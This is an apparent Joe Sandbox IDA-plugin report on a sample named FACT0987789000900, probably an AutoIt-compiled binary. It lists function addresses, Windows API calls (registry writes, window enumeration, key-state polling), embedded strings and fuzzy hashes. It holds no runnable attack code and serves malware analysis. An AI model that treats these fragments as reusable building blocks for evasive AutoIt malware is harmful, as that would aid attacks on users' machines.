Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: f87d016d0e7d94704b88bc71f6bc4d531aa7f3c53e050152704f882c6c19e183
Instruction ID: 28020f596f8aa628ef4a5c7f8c7f6a50c8544f7268b4f071ba1f7cf60166a63d
Opcode Fuzzy Hash: f87d016d0e7d94704b88bc71f6bc4d531aa7f3c53e050152704f882c6c19e183
Instruction Fuzzy Hash: 67B1A271608301AFDB04DF65C948B6BBBE5FF88314F00892EF5999B291D778E805CB96

Function 004AA856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004AA939
GetSystemMetrics.USER32(00000007), ref: 004AA941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004AA96C
GetSystemMetrics.USER32(00000008), ref: 004AA974
GetSystemMetrics.USER32(00000004), ref: 004AA999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004AA9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 004AA9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004AA9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004AAA0D
GetClientRect.USER32(00000000,000000FF), ref: 004AAA2B
GetStockObject.GDI32(00000011), ref: 004AAA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 004AAA52

Part of subcall function 004AB63C: GetCursorPos.USER32(000000FF), ref: 004AB64F
Part of subcall function 004AB63C: ScreenToClient.USER32(00000000,000000FF), ref: 004AB66C
Part of subcall function 004AB63C: GetAsyncKeyState.USER32(00000001), ref: 004AB691
Part of subcall function 004AB63C: GetAsyncKeyState.USER32(00000002), ref: 004AB69F

SetTimer.USER32(00000000,00000000,00000028,004AAB87), ref: 004AAA79

Strings

AutoIt v3 GUI, xrefs: 004AA9F1

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: e5c0a5e881467d5fa55a503417352a5960236f923028345d46c2ec31a9225720
Instruction ID: d41f6ccd04831fa241b8fbd2f1ed16100a43c37288256d38405a3870befaac53
Opcode Fuzzy Hash: e5c0a5e881467d5fa55a503417352a5960236f923028345d46c2ec31a9225720
Instruction Fuzzy Hash: 6EB1D071A0020AAFDB14DFA8CC45BEE7BB4FB28315F11421AFA05A72D0DB78D851DB65

Function 004D6CE9 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 004D6D4F
_wcscmp.LIBCMT ref: 004D6D5A
_wcscat.LIBCMT ref: 004D6D70
_wcsstr.LIBCMT ref: 004D6D7B
755A1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 004D6D97
_wcscat.LIBCMT ref: 004D6DE0
_wcscat.LIBCMT ref: 004D6DE7
_wcsncpy.LIBCMT ref: 004D6E12

Strings

StringFileInfo\, xrefs: 004D6D6A
DefaultLangCodepage, xrefs: 004D6DFA
04090000, xrefs: 004D6DCD
%u.%u.%u.%u, xrefs: 004D6E75
\VarFileInfo\Translation, xrefs: 004D6D8F

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _wcscat$A1560_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 3483108802-1459072770
Opcode ID: b1215158f95e87efff87a76551cda1b623263967e2230fd2af7e8cc6e8a19256
Instruction ID: 508312395892924be709d77867f97f51d51fbf187a569c9bca578752d95eb1df
Opcode Fuzzy Hash: b1215158f95e87efff87a76551cda1b623263967e2230fd2af7e8cc6e8a19256
Instruction Fuzzy Hash: E541D671A002007BEB00AB65DC56EFF7B7CEF55754F04002FF901B2292EB78AA0596B9

Function 00492EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00492F7A
IsWindow.USER32(?), ref: 005022FD

Strings

INSTANCE, xrefs: 0050223C
ALL, xrefs: 00502264
CLASS, xrefs: 00502128
REGEXPTITLE, xrefs: 005020F8
REGEXPCLASS, xrefs: 00502149
ACTIVE, xrefs: 005020CC
TITLE, xrefs: 00502292
LAST, xrefs: 005020B6
HANDLE, xrefs: 005020E2

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 62970417-1919597938
Opcode ID: aa48d21b25ebbd0a1c0a26fdc7c6e450dd1e6dfcf5ae9ee64638d3abeb28978b
Instruction ID: f4a460f55679e10d0314f7c807248209f8d019bda26ddd3aae321b43293c6e3b
Opcode Fuzzy Hash: aa48d21b25ebbd0a1c0a26fdc7c6e450dd1e6dfcf5ae9ee64638d3abeb28978b
Instruction Fuzzy Hash: A5D1D330104642ABCB04EF51C485A9EBFB0FF64348F504E2EF45A571E2DB34E99ADB95

Function 004F3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004F3735
RegCreateKeyExW.ADVAPI32(?,?,00000000,0052DC00,00000000,?,00000000,?,?), ref: 004F37A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004F37EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 004F3874
RegCloseKey.ADVAPI32(?), ref: 004F3B94
RegCloseKey.ADVAPI32(00000000), ref: 004F3BA1

Strings

REG_BINARY, xrefs: 004F3B2F
REG_MULTI_SZ, xrefs: 004F395C
REG_SZ, xrefs: 004F38B2
REG_QWORD, xrefs: 004F3AE2
REG_DWORD, xrefs: 004F3A65
REG_EXPAND_SZ, xrefs: 004F3811

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 41ba7da86da8382a8e6c9b9bd85f75419151312f088b823863dd62c627cb9597
Instruction ID: c2c7f3a1baff6c58399d394f20ffbc83fa3d38024a307a9eee50769a76a3e362
Opcode Fuzzy Hash: 41ba7da86da8382a8e6c9b9bd85f75419151312f088b823863dd62c627cb9597
Instruction Fuzzy Hash: 0C028F752006019FCB14EF29C855E2AB7E5FF89724F04845EF9499B3A1DB39ED01CB89

Function 004F6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004F6C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004F6D16

Strings

ISSELECTED, xrefs: 004F6D21
GETSELECTED, xrefs: 004F6E3C
SELECTALL, xrefs: 004F6D75
GETTEXT, xrefs: 004F6CBF
SELECT, xrefs: 004F6DA8
SELECTCLEAR, xrefs: 004F6D8D
GETSUBITEMCOUNT, xrefs: 004F6CA1
GETITEMCOUNT, xrefs: 004F6C84
DESELECT, xrefs: 004F6DFC
VIEWCHANGE, xrefs: 004F6ECD
SELECTINVERT, xrefs: 004F6DDE
FINDITEM, xrefs: 004F6E81
GETSELECTEDCOUNT, xrefs: 004F6CF9

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 6bf44864d9239308a065a5d54582aca44bcd3ec90daeea5cfdeee581b8a62b0c
Instruction ID: 31f8acd799c2da2a5e597649626316a1f39aca05eb8fad366e354e73389eb467
Opcode Fuzzy Hash: 6bf44864d9239308a065a5d54582aca44bcd3ec90daeea5cfdeee581b8a62b0c
Instruction Fuzzy Hash: F3A1D1302042459BCB14EF25C852A7BB7A1FF54318F11496EB9A65B3D2DB38EC06CB89

Function 004CCF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 004CCF91
__swprintf.LIBCMT ref: 004CD032
_wcscmp.LIBCMT ref: 004CD045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 004CD09A
_wcscmp.LIBCMT ref: 004CD0D6
GetClassNameW.USER32(?,?,00000400), ref: 004CD10D
GetDlgCtrlID.USER32(?), ref: 004CD15F
GetWindowRect.USER32(?,?), ref: 004CD195
GetParent.USER32(?), ref: 004CD1B3
ScreenToClient.USER32(00000000), ref: 004CD1BA
GetClassNameW.USER32(?,?,00000100), ref: 004CD234
_wcscmp.LIBCMT ref: 004CD248
GetWindowTextW.USER32(?,?,00000400), ref: 004CD26E
_wcscmp.LIBCMT ref: 004CD282

Strings

%s%u, xrefs: 004CD02C

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 4eb2daf11c34e5dd4b032a8c85e7f67d42afbd1d790662cb2912152fc4c2402a
Instruction ID: b65d4f0912f58f67dcab444feaca2cb514eb014fd87708e617df74efbfd8af10
Opcode Fuzzy Hash: 4eb2daf11c34e5dd4b032a8c85e7f67d42afbd1d790662cb2912152fc4c2402a
Instruction Fuzzy Hash: 13A1CF75A04302ABD755DF64C884FEBB7A8FF44344F00852FF99992290DB38EA05CBA5

Function 004CD8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 004CD8EB
_wcscmp.LIBCMT ref: 004CD8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 004CD924
CharUpperBuffW.USER32(?,00000000), ref: 004CD941
_wcscmp.LIBCMT ref: 004CD95F
_wcsstr.LIBCMT ref: 004CD970
GetClassNameW.USER32(00000018,?,00000400), ref: 004CD9A8
_wcscmp.LIBCMT ref: 004CD9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 004CD9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 004CDA28
_wcscmp.LIBCMT ref: 004CDA38
GetClassNameW.USER32(00000010,?,00000400), ref: 004CDA60
GetWindowRect.USER32(00000004,?), ref: 004CDAC9

Strings

@, xrefs: 004CD8C6
ThumbnailClass, xrefs: 004CD9B3, 004CDA33

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: e882614a174d0634cd889336768ef08b3a8ae2fd7ef40746a7d08cdea7b16cf2
Instruction ID: e6dc000262b4cd041ef96954a909ef04c03fba6ff0790659a1199c04b8f90049
Opcode Fuzzy Hash: e882614a174d0634cd889336768ef08b3a8ae2fd7ef40746a7d08cdea7b16cf2
Instruction Fuzzy Hash: EF81B0754082059BDB45DF10C881FAB7BA8EF84318F04847FFD899A196EB38ED45CBA5

Function 004CD6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 004CD753

Strings

ALL, xrefs: 004CD7E7
[ALL, xrefs: 004CD7F9
HANDLE=, xrefs: 004CD74C
[REGEXPTITLE:, xrefs: 004CD77B
CLASSNAME=, xrefs: 004CD790
ACTIVE, xrefs: 004CD72E
[HANDLE:, xrefs: 004CD75F
[ACTIVE, xrefs: 004CD740
LAST, xrefs: 004CD718
REGEXP=, xrefs: 004CD768
[CLASS:, xrefs: 004CD7A3
[LAST, xrefs: 004CD800

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 12e0d7123671e58ff93c06b7bdda92218bca3d4816e6b70282f63a02f408b541
Instruction ID: 82500c77b9ba3a2699a7b3f8f2f1683eb976f9f135e14115d27e0b7bd7474e0d
Opcode Fuzzy Hash: 12e0d7123671e58ff93c06b7bdda92218bca3d4816e6b70282f63a02f408b541
Instruction Fuzzy Hash: C731A135A44215A6DF14FB51DD93FEE7B74AF20708F60003FF451710E1EB69AE058669

Function 004CEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 004CEAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004CEAC2
SetWindowTextW.USER32(?,?), ref: 004CEAD9
GetDlgItem.USER32(?,000003EA), ref: 004CEAEE
SetWindowTextW.USER32(00000000,?), ref: 004CEAF4
GetDlgItem.USER32(?,000003E9), ref: 004CEB04
SetWindowTextW.USER32(00000000,?), ref: 004CEB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004CEB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004CEB45
GetWindowRect.USER32(?,?), ref: 004CEB4E
SetWindowTextW.USER32(?,?), ref: 004CEBB9
GetDesktopWindow.USER32 ref: 004CEBBF
GetWindowRect.USER32(00000000), ref: 004CEBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 004CEC12
GetClientRect.USER32(?,?), ref: 004CEC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 004CEC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004CEC6F

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 02c1da482c2366b8ec8a6315770c97d3b22b8fb671bbe9ff66674cebc3d3f3b3
Instruction ID: 17448ce93be80f5a82230557fb0f2c4887c9ef1368e52971f9ffa8e61b004399
Opcode Fuzzy Hash: 02c1da482c2366b8ec8a6315770c97d3b22b8fb671bbe9ff66674cebc3d3f3b3
Instruction Fuzzy Hash: 92514B75900709AFDB20DFA9CD89FAEBBB5FB04704F00491DE546A26A0D778B944DB14

Function 004E79B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 004E79C6
LoadCursorW.USER32(00000000,00007F00), ref: 004E79D1
LoadCursorW.USER32(00000000,00007F03), ref: 004E79DC
LoadCursorW.USER32(00000000,00007F8B), ref: 004E79E7
LoadCursorW.USER32(00000000,00007F01), ref: 004E79F2
LoadCursorW.USER32(00000000,00007F81), ref: 004E79FD
LoadCursorW.USER32(00000000,00007F88), ref: 004E7A08
LoadCursorW.USER32(00000000,00007F80), ref: 004E7A13
LoadCursorW.USER32(00000000,00007F86), ref: 004E7A1E
LoadCursorW.USER32(00000000,00007F83), ref: 004E7A29
LoadCursorW.USER32(00000000,00007F85), ref: 004E7A34
LoadCursorW.USER32(00000000,00007F82), ref: 004E7A3F
LoadCursorW.USER32(00000000,00007F84), ref: 004E7A4A
LoadCursorW.USER32(00000000,00007F04), ref: 004E7A55
LoadCursorW.USER32(00000000,00007F02), ref: 004E7A60
LoadCursorW.USER32(00000000,00007F89), ref: 004E7A6B
GetCursorInfo.USER32(?), ref: 004E7A7B

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 8d424038f65319e4171550a2e2103ad223024319816f18b6b81835c43e2760ee
Instruction ID: f07159a6bc42fd0d98324103aac7ae308168453f1c99c7f35b6e88e95c17b474
Opcode Fuzzy Hash: 8d424038f65319e4171550a2e2103ad223024319816f18b6b81835c43e2760ee
Instruction Fuzzy Hash: F93116B1D083196ADB109FB69C8995FBFE8FF04764F50453BA50DE7280DA7CA5008FA5

Function 0049C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 004AE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0049C8B7,?,00002000,?,?,00000000,?,0049419E,?,?,?,0052DC00), ref: 004AE984

Part of subcall function 0049660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004953B1,?,?,004961FF,?,00000000,00000001,00000000), ref: 0049662F

__wsplitpath.LIBCMT ref: 0049C93E

Part of subcall function 004B1DFC: __wsplitpath_helper.LIBCMT ref: 004B1E3C

_wcscpy.LIBCMT ref: 0049C953
_wcscat.LIBCMT ref: 0049C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0049C978
SetCurrentDirectoryW.KERNEL32(?), ref: 0049CABE

Part of subcall function 0049B337: _wcscpy.LIBCMT ref: 0049B36F

Strings

Error opening the file, xrefs: 005030B4, 0050313D
AU3!, xrefs: 0049C90C
EA06, xrefs: 005030C9
Bad directive syntax error, xrefs: 00503429
>>>AUTOIT SCRIPT<<<, xrefs: 0050311B
Unterminated string, xrefs: 00503470
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00503098

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: 6d5d967e014fa78863a2e92df6c5dc4de0a10596722e1eeddb2c1eefe39a2778
Instruction ID: 37e43886d0744bd46edd4d823a9b727bb00ca9a60ad087384e15f7531d1523ee
Opcode Fuzzy Hash: 6d5d967e014fa78863a2e92df6c5dc4de0a10596722e1eeddb2c1eefe39a2778
Instruction Fuzzy Hash: 8912A3715083419FCB14EF25C891AAFBBE4BF99308F00492FF585932A1DB34DA49CB56

Function 004FCE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004FCEFB
DestroyWindow.USER32(?,?), ref: 004FCF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 004FCFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 004FD016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004FD025
DestroyWindow.USER32(?), ref: 004FD042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00490000,00000000), ref: 004FD075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004FD094
GetDesktopWindow.USER32 ref: 004FD0A9
GetWindowRect.USER32(00000000), ref: 004FD0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004FD0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 004FD0DA

